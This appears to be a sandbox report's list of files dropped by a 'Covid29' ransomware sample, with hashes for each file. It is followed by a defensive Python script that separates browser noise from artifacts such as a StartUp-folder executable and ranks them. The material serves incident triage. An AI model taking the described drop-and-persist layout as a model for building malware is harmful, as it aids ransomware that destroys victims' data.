| SHA256 | ebfdcb0cb8591525357a1c002c41d91e639d830b71af792a40eb287e645ecec6 |
| SHA512 | 1e6041af9c13f4336861149f5b9f5e1e3f2cd90fbf141fc3eb30f49dfbd5d2a890195d71bb70924506e50e8555be56fdbec19e8c06007fb99e52fc2ca94ded4a |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\19e1e28f1f860aaa_0
| MD5 | f7a3c6af8a7890f75d417a625835569e |
| SHA1 | 5141b1ec48a2f2a5b6399035357816c11114b579 |
| SHA256 | d4d34f97e503b3229b5a368ee402a53b4050c69b622bb2585ae6d8234e7d939c |
| SHA512 | 6955cf5057d4d589076e9c3df789251d009e64e5302ea2020ee2af962202e6f7246f2a995e68097e531128820d884de2c349011bb5bb31b2369c539bdf341804 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\58117b026a3644d0_0
| MD5 | c2f111bc88324c6c06fa1623ac89ad3c |
| SHA1 | f67dabe741bd638d8f1440423c76ed9f79f61044 |
| SHA256 | 43329227a7739b56a242e6c24ede244a7e030f2b1dd63c16960e87f9da3aeac6 |
| SHA512 | 5dea68c4af5a5707ca529edd8329b9749001bff960b38cc61ec9ba749f7978a64b7155589f454c9be1e42f013ee33cbdb6a3f250b09a3ca864222d5ca4da3e3e |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
| MD5 | 357fa9c64425ee1817d52ad0ed5c7057 |
| SHA1 | 52e22239ed000337252febda7b664ce9c70f663a |
| SHA256 | f430274124bf719fc8dea35a34881a5889ad4cd84b147973c2ad06b5e18e4558 |
| SHA512 | 68e99451f3b4aaa15a04a91023f7c9ccfc78beb584765048cfbf18391595d67bf26ffb55e48c67fa1433f8245a3484679a10005d478c1b0def76236ae6a477b1 |
C:\Users\Admin\Downloads\Covid29 Ransomware.zip
| MD5 | 272d3e458250acd2ea839eb24b427ce5 |
| SHA1 | fae7194da5c969f2d8220ed9250aa1de7bf56609 |
| SHA256 | bbb5c6b4f85c81a323d11d34629776e99ca40e983c5ce0d0a3d540addb1c2fe3 |
| SHA512 | d05bb280775515b6eedf717f88d63ed11edbaae01321ec593ecc0725b348e9a0caacf7ebcd2c25a6e0dc79b2cdae127df5aa380b48480332a6f5cd2b32d4e55c |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
| MD5 | ea3e4e6baed06b04ca02b187412b627b |
| SHA1 | 08f8280e3b4046242084772e58f1e6c1fd01d033 |
| SHA256 | 1987bb85709fd8e24b721989f9509d2fcbea7e9df8eb90a737294d496ce574d5 |
| SHA512 | 2ba67993011e8c21894868ebf416a239baaf6e6543d7f7c635fafccae18662baf419d192bd802bab8c155ce5f87dd99d440a3c9a2193d9f604523f52902fd88c |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index
| MD5 | 6d703912c20e9b183e22cac8a9565b14 |
| SHA1 | 46749780aeaeb2cbc38d669747cc91a85aec546c |
| SHA256 | ab2a2e8430dddfc55c70c008516ec197d22526a9be9fb6740b0a770ff9ef8c99 |
| SHA512 | 4bdce607b983bb30731fbfcda5eff54d6b5e2040bfddd811b73517be761021362bc5c9043e1007dd13cb2d9d2d163b5f55e5f1edc44ce927311497377f108d7f |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | 2bca31c03a7f14ab889b0bb097d3a173 |
| SHA1 | 7d80f7282023045dc24f0784fb0c5aad893ad136 |
| SHA256 | 7283b4346e464fd4caa2f4b68e10dc50835a43b881009084c368f4efe261ee0a |
| SHA512 | 861e3e7ef797fd7490b8b96a4ab75da15de1a5d92740b68381571bd342344d9378944f5aa53d4049dfef58dab5775a12fcbdf06a16314ae90792d48dff12df78 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
| MD5 | 7acc1234fe2c0c68c50efef946557ce8 |
| SHA1 | 1e4aae17680a49c8befed907b41959cb34b65c88 |
| SHA256 | 09585e2f181233286250104dae23d8316c7ed9e232d3fdf0c1e12423c0071062 |
| SHA512 | bf987f20da574ff2de2e6afe3712bd9a54f913a844cb4be3bafe57cc66655b3a5250f1b179e9b2decffc795979c565b330b3b2652bf58c58a81cd5c1069f7609 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
| MD5 | 651dc6152dcdb2cbb810645d7e13d179 |
| SHA1 | 3ce0a6253b0097663f9302e9d0435c14bb7cb987 |
| SHA256 | 00169eaed37c08d6a1f822721a1ce91fa248a3fe2d095e3b6b97e9469d201a47 |
| SHA512 | 0fb638d86bd57ef8e50059acd5efaed705722b9143882af6dc54bb3236ed8cf2ae160a3b24196151cd6de2979abee49170506d6b0f3da227df4216122611634d |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\blob_storage\ee308430-f75c-4e19-b47b-68b5980398df\3
| MD5 | 3372060e38adc9e173ab8a8cb7a854be |
| SHA1 | a4ca57fb5583ff3b81a7431dd6fb028ca854b301 |
| SHA256 | 1e9d7d09ea7558a6312c64dc4edd000e8a487fb6c23b710feb84a97137e7a550 |
| SHA512 | bff388f5857ed4ce969dd3e25efd2d29824eccb5ae6567b4d354f50da426f235bf345be4e4942beac45a74b38fb26922da5a6983ed74cb12e4257e5aaa8fbc2b |
C:\Users\Admin\Downloads\Unconfirmed 884525.crdownload
| MD5 | ac9526ec75362b14410cf9a29806eff4 |
| SHA1 | ef7c1b7181a9dc4e0a1c6b3804923b58500c263d |
| SHA256 | 5ae89b053a9c8e4ad9664b6d893998f281f2864c0f625a536400624d4fbd0164 |
| SHA512 | 29514a83a5bb78439ee8fb9d64b9e0885f4444fb7f02cefdee939984bb80f58493b406787c53f9a4bf521b2c03af4c3e3da4d5033eee8095b2ab0e753534e621 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | c92bb5e1facd87f1bbcdfed375aa99ec |
| SHA1 | 34589d17bc183054746c306b81a6b9f26c21128e |
| SHA256 | f2a40bb0c3aa3e96780d6ed7bd5ac3a431455d2add90152cb032f49b4a0ef7b2 |
| SHA512 | e1d5663bb506443993e45828088d59fbd83a294fa710cdf136d9cba579afd8572ae6876e9ef7453592c6e62c6ed79aa52c90a7221ea9bb59456f65875a7b7981 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | cadd49c2aa7ae0a8c0eb92dfee6e3cfa |
| SHA1 | 09a3fedd04e7cf1968e1ff79715ec5a88ae77f99 |
| SHA256 | 2598e6a6730537c5c6fd396395fb409520f38e1a35c28675af34926bc55467c4 |
| SHA512 | 7bcbebafc61a0bc07748d81bbb4ed7bb3830027cba6b0b35120cc9688a8fe32f61fbfa7cbc390498f7fb8f82b54af511a43c5b7ba4010bc524d1cbaafb5b76c4 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
| MD5 | a597c39c9890ccad906dc0fbfbda1de1 |
| SHA1 | b7e935a1ff8b0b829b3647656ffb0a471d5c1320 |
| SHA256 | 15674e62d80acf500088b2ba7e0f3cebd781bc311f7d3421964182bf196413f8 |
| SHA512 | 129efb1cd6e8eec7ecb1f90f9241e3ab5ac167af8d4253f896a68b13b4c69e5f3eb994531a2c02b21384c4d5471e77a0ff8807354aab9a5988a794df803e57c9 |
C:\Users\Admin\AppData\Local\Temp\63FF.tmp\mbr.exe
| MD5 | 35af6068d91ba1cc6ce21b461f242f94 |
| SHA1 | cb054789ff03aa1617a6f5741ad53e4598184ffa |
| SHA256 | 9ac99df89c676a55b48de00384506f4c232c75956b1e465f7fe437266002655e |
| SHA512 | 136e3066c6e44af30691bcd76d9af304af0edf69f350211cf74d6713c4c952817a551757194b71c3b49ac3f87a6f0aa88fb80eb1e770d0f0dd82b29bfce80169 |
C:\Users\Admin\AppData\Local\Temp\63FF.tmp\Cov29Cry.exe
| MD5 | 8bcd083e16af6c15e14520d5a0bd7e6a |
| SHA1 | c4d2f35d1fdb295db887f31bbc9237ac9263d782 |
| SHA256 | b4f78ff66dc3f5f8ddd694166e6b596d533830792f9b5f1634d3f5f17d6a884a |
| SHA512 | 35999577be0626b50eeab65b493d48af2ab42b699f7241d2780647bf7d72069216d99f5f708337a109e79b9c9229613b8341f44c6d96245fd1f3ac9f05814d6a |
C:\Users\Admin\Desktop\covid29-is-here.txt
| MD5 | c53dee51c26d1d759667c25918d3ed10 |
| SHA1 | da194c2de15b232811ba9d43a46194d9729507f0 |
| SHA256 | dd5b3d185ae1809407e7822de4fced945115b48cc33b2950a8da9ebd77a68c52 |
| SHA512 | da41cef03f1b5f21a1fca2cfbf1b2b180c261a75d391be3a1ba36e8d4d4aefab8db024391bbee06b99de0cb0b8eb8c89f2a304c27e20c0af171b77db33b2d12c |
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\melter.exe
| MD5 | 33b75bd8dbb430e95c70d0265eeb911f |
| SHA1 | 5e92b23a16bef33a1a0bf6c1a7ee332d04ceab83 |
| SHA256 | 2f69f7eeab4c8c2574ef38ed1bdea531b6c549ef702f8de0d25c42dcc4a2ca12 |
| SHA512 | 943d389bea8262c5c96f4ee6f228794333220ea8970bcc68ab99795d4efd24ebf24b2b9715557dfa2e46cfc3e7ab5adff51db8d41ef9eb10d04370ce428eb936 |
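Most entries in the dropped-files listing above are Chrome profile churn (cache blocks, `Preferences`, `TransportSecurity`, `Network Persistent State`) that the browser rewrites on its own; the entries worth pivoting on are the two executables under `C:\Users\Admin\AppData\Local\Temp\63FF.tmp\` (`mbr.exe`, `Cov29Cry.exe`), the `covid29-is-here.txt` file written to the Desktop, and `melter.exe` placed in the all-users `StartUp` folder, which will run at the next interactive logon. The script below is an added example, not part of the sandbox report, that parses this path-plus-hash-rows layout, checks each digest has the right length (a truncated copy is a common cause of dead IOCs), tags entries by path, and ranks the artifacts above the browser noise. The sample input is constructed from six entries copied verbatim from the listing above; the tag names, path heuristics and scores are the example's own.

```python
"""Triage a sandbox "dropped files" listing: a path line followed by
`| MD5 | ... |` style hash rows. Separates browser-profile churn from
artifacts worth pivoting on and ranks the artifacts by path heuristics."""
import ntpath
import re
from dataclasses import dataclass, field

# Expected hex length per digest; a mismatch usually means a truncated copy/paste.
HASH_LENGTHS = {"MD5": 32, "SHA1": 40, "SHA256": 64, "SHA512": 128}
HASH_ROW = re.compile(r"^\|\s*(MD5|SHA1|SHA256|SHA512)\s*\|\s*([0-9a-fA-F]+)\s*\|$")

# Path heuristics and scores are this example's own, not the sandbox's taxonomy.
BROWSER_PROFILE = re.compile(r"\\(Google\\Chrome|Microsoft\\Edge)\\User Data\\", re.I)
AUTOSTART = re.compile(r"\\Start Menu\\Programs\\StartUp\\", re.I)
TEMP_DIR = re.compile(r"\\AppData\\Local\\Temp\\", re.I)
DOWNLOADS = re.compile(r"\\Downloads\\", re.I)
EXEC_EXT = {".exe", ".dll", ".scr", ".com", ".bat", ".cmd", ".ps1", ".vbs", ".js"}
TAG_SCORE = {"autostart": 3, "executable": 2, "temp-drop": 1, "note-candidate": 1}

# Constructed sample: six entries copied from the listing above.
SAMPLE_LISTING = r"""
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
| MD5 | a597c39c9890ccad906dc0fbfbda1de1 |
| SHA1 | b7e935a1ff8b0b829b3647656ffb0a471d5c1320 |
| SHA256 | 15674e62d80acf500088b2ba7e0f3cebd781bc311f7d3421964182bf196413f8 |
| SHA512 | 129efb1cd6e8eec7ecb1f90f9241e3ab5ac167af8d4253f896a68b13b4c69e5f3eb994531a2c02b21384c4d5471e77a0ff8807354aab9a5988a794df803e57c9 |
C:\Users\Admin\Downloads\Covid29 Ransomware.zip
| MD5 | 272d3e458250acd2ea839eb24b427ce5 |
| SHA1 | fae7194da5c969f2d8220ed9250aa1de7bf56609 |
| SHA256 | bbb5c6b4f85c81a323d11d34629776e99ca40e983c5ce0d0a3d540addb1c2fe3 |
| SHA512 | d05bb280775515b6eedf717f88d63ed11edbaae01321ec593ecc0725b348e9a0caacf7ebcd2c25a6e0dc79b2cdae127df5aa380b48480332a6f5cd2b32d4e55c |
C:\Users\Admin\AppData\Local\Temp\63FF.tmp\mbr.exe
| MD5 | 35af6068d91ba1cc6ce21b461f242f94 |
| SHA1 | cb054789ff03aa1617a6f5741ad53e4598184ffa |
| SHA256 | 9ac99df89c676a55b48de00384506f4c232c75956b1e465f7fe437266002655e |
| SHA512 | 136e3066c6e44af30691bcd76d9af304af0edf69f350211cf74d6713c4c952817a551757194b71c3b49ac3f87a6f0aa88fb80eb1e770d0f0dd82b29bfce80169 |
C:\Users\Admin\AppData\Local\Temp\63FF.tmp\Cov29Cry.exe
| MD5 | 8bcd083e16af6c15e14520d5a0bd7e6a |
| SHA1 | c4d2f35d1fdb295db887f31bbc9237ac9263d782 |
| SHA256 | b4f78ff66dc3f5f8ddd694166e6b596d533830792f9b5f1634d3f5f17d6a884a |
| SHA512 | 35999577be0626b50eeab65b493d48af2ab42b699f7241d2780647bf7d72069216d99f5f708337a109e79b9c9229613b8341f44c6d96245fd1f3ac9f05814d6a |
C:\Users\Admin\Desktop\covid29-is-here.txt
| MD5 | c53dee51c26d1d759667c25918d3ed10 |
| SHA1 | da194c2de15b232811ba9d43a46194d9729507f0 |
| SHA256 | dd5b3d185ae1809407e7822de4fced945115b48cc33b2950a8da9ebd77a68c52 |
| SHA512 | da41cef03f1b5f21a1fca2cfbf1b2b180c261a75d391be3a1ba36e8d4d4aefab8db024391bbee06b99de0cb0b8eb8c89f2a304c27e20c0af171b77db33b2d12c |
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\melter.exe
| MD5 | 33b75bd8dbb430e95c70d0265eeb911f |
| SHA1 | 5e92b23a16bef33a1a0bf6c1a7ee332d04ceab83 |
| SHA256 | 2f69f7eeab4c8c2574ef38ed1bdea531b6c549ef702f8de0d25c42dcc4a2ca12 |
| SHA512 | 943d389bea8262c5c96f4ee6f228794333220ea8970bcc68ab99795d4efd24ebf24b2b9715557dfa2e46cfc3e7ab5adff51db8d41ef9eb10d04370ce428eb936 |
"""


@dataclass
class DroppedFile:
    path: str
    hashes: dict = field(default_factory=dict)   # algo -> lowercase hex digest
    tags: set = field(default_factory=set)
    problems: list = field(default_factory=list)  # malformed digests etc.


def parse_dropped_files(text):
    """Turn the listing into DroppedFile objects; a bare line starts a new entry,
    a recognised hash row attaches to the current entry, other rows are skipped."""
    entries, current = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        m = HASH_ROW.match(line)
        if m:
            if current is None:
                raise ValueError(f"hash row before any path: {line}")
            algo, digest = m.group(1), m.group(2).lower()
            if len(digest) != HASH_LENGTHS[algo]:
                current.problems.append(f"{algo}: {len(digest)} hex chars, expected {HASH_LENGTHS[algo]}")
            current.hashes[algo] = digest
        elif not line.startswith("|"):
            current = DroppedFile(path=line)
            entries.append(current)
    return entries


def classify(entry):
    """Tag an entry from its path alone (ntpath handles Windows paths on any host)."""
    path = entry.path
    ext = ntpath.splitext(ntpath.basename(path))[1].lower()
    tags = set()
    if BROWSER_PROFILE.search(path):
        tags.add("browser-profile")
    if ext in EXEC_EXT:
        tags.add("executable")
    if AUTOSTART.search(path):
        tags.add("autostart")
    if TEMP_DIR.search(path):
        tags.add("temp-drop")
    if DOWNLOADS.search(path):
        tags.add("download")
    if ext == ".txt" and "\\desktop\\" in path.lower():
        tags.add("note-candidate")   # heuristic: text dropped on the Desktop
    entry.tags = tags
    return tags


def triage(text):
    """Return (artifacts ranked by tag score, browser-profile noise)."""
    entries = parse_dropped_files(text)
    for e in entries:
        classify(e)
    noise = [e for e in entries if "browser-profile" in e.tags]
    artifacts = [e for e in entries if "browser-profile" not in e.tags]
    artifacts.sort(key=lambda e: sum(TAG_SCORE.get(t, 0) for t in e.tags), reverse=True)
    return artifacts, noise


def to_ioc_lines(entries):
    """One line per entry: sha256, path, tags, and any digest problems."""
    return [f"{e.hashes.get('SHA256', '?')}  {e.path}  [{','.join(sorted(e.tags)) or 'untagged'}]"
            + (f"  !! {'; '.join(e.problems)}" if e.problems else "")
            for e in entries]


if __name__ == "__main__":
    found, skipped = triage(SAMPLE_LISTING)
    print("\n".join(to_ioc_lines(found)))
    print(f"# skipped {len(skipped)} browser-profile file(s)")
```

Feed the whole listing through `triage()` and the browser files drop out while `melter.exe` rises to the top, which is what you want before blocking hashes or writing detection content: the `StartUp` drop is the persistence mechanism, the `Temp\63FF.tmp` executables are the payload stage, and the Desktop text file is the candidate ransom note. Keep the `problems` field in mind when pasting hashes from a rendered page; a digest with the wrong length will never match anything.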